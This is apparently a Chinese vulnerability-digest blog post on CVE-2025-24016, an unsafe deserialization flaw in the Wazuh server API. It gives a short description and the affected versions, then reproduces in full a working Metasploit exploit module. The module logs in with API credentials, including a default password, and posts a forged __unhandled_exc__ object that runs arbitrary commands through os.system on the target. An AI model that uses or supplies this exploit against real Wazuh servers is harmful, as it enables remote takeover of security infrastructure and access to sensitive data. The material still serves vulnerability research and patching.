Wazuh server remote code execution caused by an unsafe deserialization vulnerability

漏洞信息

漏洞名称: Wazuh server remote code execution caused by an unsafe deserialization vulnerability

漏洞编号:

  • CVE: CVE-2025-24016

漏洞类型: 反序列化

漏洞等级: 高危

漏洞描述: Wazuh是一个免费开源的平台,用于威胁预防、检测和响应。它广泛应用于企业级服务,作为安全信息和事件管理(SIEM)解决方案的一部分,帮助组织监控和分析安全事件。该平台因其强大的功能和灵活性而受到许多组织的青睐。

该漏洞存在于Wazuh服务器的分布式API中,由于不安全的反序列化操作,攻击者可以通过构造特定的请求来触发未处理的异常,从而执行任意Python代码。具体来说,当攻击者能够向DAPI请求/响应中注入未经过滤的字典时,可以伪造一个__unhandled_exc__异常,进而评估任意代码。这一漏洞的技术根源在于as_wazuh_object方法在反序列化过程中未能充分验证输入数据的安全性。

此漏洞的影响极为严重,因为它允许攻击者在受影响的Wazuh服务器上执行远程代码。这意味着攻击者可以完全控制服务器,执行任意命令,访问敏感数据,甚至利用服务器作为跳板进一步攻击内部网络。值得注意的是,任何具有API访问权限的用户(包括被入侵的仪表板或集群中的Wazuh服务器)都可能触发此漏洞。在某些配置下,甚至被入侵的代理也可以利用此漏洞。因此,该漏洞不仅威胁到单个服务器的安全,还可能对整个组织的网络安全构成严重威胁。

产品厂商: Wazuh

产品名称: Wazuh

影响版本: 4.4.0 <= version < 4.9.1

来源: https://github.com/rapid7/metasploit-framework/blob/f6e0c43ed9bd896ae270edba836799c80e6e00ea/modules%2Fexploits%2Flinux%2Fhttp%2Fwazuh_auth_rce_cve_2025_24016.rb

类型: rapid7/metasploit-framework:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wazuh server remote code execution caused by an unsafe deserialization vulnerability.',
        'Description' => %q{
          Wazuh is a free and open source platform used for threat prevention, detection, and response.
          Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability
          allows for remote code execution on Wazuh servers. DistributedAPI parameters are a serialized
          as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`).
          If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can
          forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code.
          The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh
          servers in the cluster) or, in certain configurations, even by a compromised agent.
        },
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module & default password weakness
          'DanielFi https://github.com/DanielFi', # Discovery
        ],
        'References' => [
          ['CVE', '2025-24016'],
          ['URL', 'https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh'],
          ['URL', 'https://attackerkb.com/topics/xxx/cve-2025-24016']
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Privileged' => false,
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'Unix/Linux Command',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2025-02-10',
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 55000
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Path to the wazuh manager', '/']),
      OptString.new('API_USER', [true, 'Wazuh API user', 'wazuh-wui']),
      OptString.new('API_PWD', [true, 'Wazuh API password', 'MyS3cr37P450r.*-'])
    ])
  end

  # get Wazuh API token
  # return token if API login is successful else nil
  def get_api_token
    auth = Base64.strict_encode64("#{datastore['API_USER']}:#{datastore['API_PWD']}")
    basic_auth = "Basic #{auth}"
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'security', 'user', 'authenticate'),
      'headers' => {
        'Authorization' => basic_auth.to_s
      }
    })
    return unless res&.code == 200 && res.body.include?('token')

    res_json = res.get_json_document
    res_json['data']['token'] unless res_json.blank?
  end

  # get the Wazuh version
  # return version if successful else nil
  def get_wazuh_version(api_token)
    api_auth = "Bearer #{api_token}"
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path),
      'headers' => {
        'Authorization' => api_auth.to_s
      }
    })
    return unless res&.code == 200 && res.body.include?('api_version')

    res_json = res.get_json_document
    res_json['data']['api_version'] unless res_json.blank?
  end

  # CVE-2025-24016: Command Injection leading to RCE via unsafe deserialization vulnerability
  def execute_command(cmd, _opts = {})
    # {"__unhandled_exc__":{"__class__": "os.system", "__args__": ["cmd"]}}
    post_data = {
      __unhandled_exc__:
      {
        __class__: 'os.system',
        __args__: [ cmd.to_s ]
      }
    }.to_json

    auth = Base64.strict_encode64("#{datastore['API_USER']}:#{datastore['API_PWD']}")
    basic_auth = "Basic #{auth}"
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'security', 'user', 'authenticate', 'run_as'),
      'ctype' => 'application/json',
      'headers' => {
        'Authorization' => basic_auth.to_s
      },
      'data' => post_data.to_s
    })
  end

  def check
    # check Wazuh API access with the API credentials
    api_token = get_api_token
    return CheckCode::Unknown('Can not access the Wazuh API with provided credentials.') if api_token.nil?

    version = get_wazuh_version(api_token)
    return CheckCode::Detected('Can not determine the Wazuh version.') if version.nil?

    version = Rex::Version.new(version)
    unless version >= Rex::Version.new('4.4.0') && version < Rex::Version.new('4.9.1')
      return CheckCode::Safe("Wazuh version #{version}")
    end

    CheckCode::Appears("Wazuh version #{version}")
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    execute_command(payload.encoded)
  end
end


Github Poc
#反序列化 #rapid7/metasploit-framework:github issues
Wazuh server remote code execution caused by an unsafe deserialization vulnerability
http://example.com/2025/07/16/github_3836851729/
作者
lianccc
发布于
2025年7月16日
许可协议